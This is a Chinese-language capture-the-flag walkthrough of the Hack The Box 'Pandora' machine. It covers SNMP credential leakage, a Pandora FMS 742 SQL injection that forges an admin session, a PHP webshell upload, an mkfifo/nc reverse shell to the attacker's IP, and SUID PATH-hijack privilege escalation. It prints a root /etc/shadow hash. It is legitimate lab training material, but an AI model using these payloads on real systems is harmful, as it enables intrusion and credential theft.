基本信息

https://www.hackthebox.com/home/machines/profile/423
10.10.11.136

端口扫描

22和80:

$ nmap -sC -sV 10.10.11.136
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-11 10:33 CST
Nmap scan report for 10.10.11.136
Host is up (0.067s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
|   256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_  256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Play | Landing
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.88 seconds

80

UDP端口扫描

tcp的80没什么东西，尝试UDP扫描,发现161 snmp端口：

$ sudo nmap -sU -sC -sV 10.10.11.136
Password:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-11 10:36 CST
Nmap scan report for 10.10.11.136
Host is up (0.079s latency).
Not shown: 999 closed udp ports (port-unreach)
Bug in snmp-win32-software: no string output.
PORT    STATE SERVICE VERSION
161/udp open  snmp    SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-netstat:
|   TCP  0.0.0.0:22           0.0.0.0:0
|   TCP  10.10.11.136:22      10.10.14.9:63085
|   TCP  10.10.11.136:46700   1.1.1.1:53
|   TCP  127.0.0.1:3306       0.0.0.0:0
|   TCP  127.0.0.53:53        0.0.0.0:0
|   UDP  0.0.0.0:161          *:*
|_  UDP  127.0.0.53:53        *:*
| snmp-info:
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: 48fa95537765c36000000000
|   snmpEngineBoots: 30
|_  snmpEngineTime: 11h38m36s
| snmp-interfaces:
|   lo
|     IP address: 127.0.0.1  Netmask: 255.0.0.0
|     Type: softwareLoopback  Speed: 10 Mbps
|   VMware VMXNET3 Ethernet Controller
|     IP address: 10.10.11.136  Netmask: 255.255.254.0
|     MAC address: 00:50:56:b9:92:25 (VMware)
|_    Type: ethernetCsmacd  Speed: 4 Gbps
| snmp-processes:
|   1:
|   2:
|   3:
|   4:
|   6:
|   9:
|   10:
|   11:
|   12:
|   13:
|   14:
|   15:
|   16:
|   17:
|   18:
|   20:
|   21:
|   22:
|   23:
|   24:
|   25:
|   26:
|   27:
|   28:
|   29:
|   30:
|   77:
|   78:
|   79:
|_  80:
| snmp-sysdescr: Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64
|_  System uptime: 11h38m36.31s (4191631 timeticks)
Service Info: Host: pandora

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1036.43 seconds

SNMP

snmp枚举可以发现一组账号密码：

https://github.com/dheiland-r7/snmp

perl snmpbw.pl 10.10.11.136 public 2 1
perl snmpprs.pl 10.10.11.136.snmp

snmpwalk -v 2c -c public 10.10.11.136 1.3.6.1.2.1.25.4.2.1.5

-u daniel -p HotelBabylon23

daniel

得到的daniel登录ssh：

信息

发现本地开着一个pandora_console：

pandora_console

转发出来访问,v7.0NG.742_FIX_PERL2020：

1	ssh -L 8888:localhost:80 daniel@10.10.11.136

搜到两个漏洞：

Pandora FMS 742: Critical Code Vulnerabilities Explained
https://blog.sonarsource.com/pandora-fms-742-critical-code-vulnerabilities-explained
TheCyberGeek/CVE-2020-5844
https://github.com/TheCyberGeek/CVE-2020-5844

所以应该是两个结合利用，sql注入进后台，然后上传php webshell

sql injection

根据文章分析就是chart_generator.php中的session_id导致的，文章没给详细poc，可以直接暴力dump session表，其中得到结构信息，根据结构构造出admin的data，注入伪造admin：

sqlmap -u http://127.0.0.1:8888/pandora_console/include/chart_generator.php\?session_id\=1 -v 3 -D pandora -T tsessions_php --dump

| g4e01qdgk36mfdh90hvcc54umq | id_usuario|s:4:"matt";alert_msg|a:0:{}new_chat|b:0; | 1638796349  |


http://127.0.0.1:8888/pandora_console/include/chart_generator.php?session_id=%27%20union%20SELECT%201,2,%27id_usuario|s:5:%22admin%22;%27%20as%20data%20--%20SgGO

SELECT * FROM tsessions_php  WHERE `id_session` = '' union SELECT 1,2,'id_usuario|s:5:"admin";' as data -- SgGO LIMIT 1

webshell

admin有文件上传功能，上传webshell：

reverse shell & user flag

1	http://127.0.0.1:8888/pandora_console/images/shell.php?cmd=rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f\|/bin/sh%20-i%202%3E%261\|nc%2010.10.14.9%204444%20%3E/tmp/f

提权信息

suid程序,内部调用tar，没有指定绝对路径:

提权 & root flag

首先写公钥到matt，ssh登录，后面操作的上下文都是在matt的ssh环境下：

matt@pandora:/tmp$ mkdir nya
matt@pandora:/tmp$ cd nya
matt@pandora:/tmp/nya$ ls
matt@pandora:/tmp/nya$ echo "/bin/sh" > tar
matt@pandora:/tmp/nya$ chmod +x ./tar
matt@pandora:/tmp/nya$ export PATH=$(pwd):$PATH
matt@pandora:/tmp/nya$ /usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
# id
uid=0(root) gid=1000(matt) groups=1000(matt)
# cd /root
# ls
root.txt
# cat root.txt
ebb61c8c6de683f0d5c4778f2ee66826
# cat /etc/shadow
root:$6$HM2preufywiCDqbY$XPrZFWf6w08MKkjghhCPBkxUo2Ag5xvZYOh4iD4XcN4zOVbWsdvqLYbznbUlLFxtC/.Z0oe9D6dT0cR7suhfr.:18794:0:99999:7:::

参考资料

https://github.com/dheiland-r7/snmp
Pandora FMS 742: Critical Code Vulnerabilities Explained
https://blog.sonarsource.com/pandora-fms-742-critical-code-vulnerabilities-explained
TheCyberGeek/CVE-2020-5844
https://github.com/TheCyberGeek/CVE-2020-5844
Pandora: HTB [Walkthrough]. Highlights | by d3xter | Jan, 2022 | Medium
https://medium.com/@d3xter/pandora-htb-walkthrough-e3b64569c39f

Pandora - HackTheBox

2022-01-11